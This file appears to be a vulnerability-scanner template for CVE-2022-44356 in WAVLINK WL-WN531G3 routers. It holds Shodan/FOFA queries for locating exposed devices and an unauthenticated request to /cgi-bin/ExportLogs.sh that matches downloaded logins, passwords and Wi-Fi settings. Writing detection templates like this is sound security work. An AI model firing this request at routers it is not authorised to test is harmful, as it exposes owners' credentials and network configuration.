id: CVE-2022-44356 info: name: WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure author: ritikchaddha severity: high description: | WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files. remediation: | Apply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface. impact: | Successful exploitation could lead to sensitive information disclosure. reference: - https://github.com/strik3r0x1/Vulns/blob/main/Wavlink%20WL-WN531G3.md - https://nvd.nist.gov/vuln/detail/CVE-2022-44356 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-44356 epss-score: 0.47061 epss-percentile: 0.97737 cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:m31g3.v5030.200325:*:*:*:*:*:*:* metadata: max-request: 1 verified: true vendor: wavlink product: wl-wn531g3_firmware shodan-query: html:"WN531G3" fofa-query: body="WN531G3" tags: cve,cve2022,wavlink,exposure,wn531g3,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl dsl: - 'contains(body, "WN531G3")' internal: true - method: GET path: - "{{BaseURL}}/cgi-bin/ExportLogs.sh" matchers: - type: dsl dsl: - 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")' - 'contains_all(header, "application/octet-stream", "filename=\"")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100cf4102994dee921037bfd0a8b6b85dae4c791cc26a1e42c7e61284118d89da3f022100f8ed5d8cca2f7d7d791f876515c06b2bab29d7dc3e90ed274059faa0d213a6e8:922c64590222798bb761d5b6d8e72950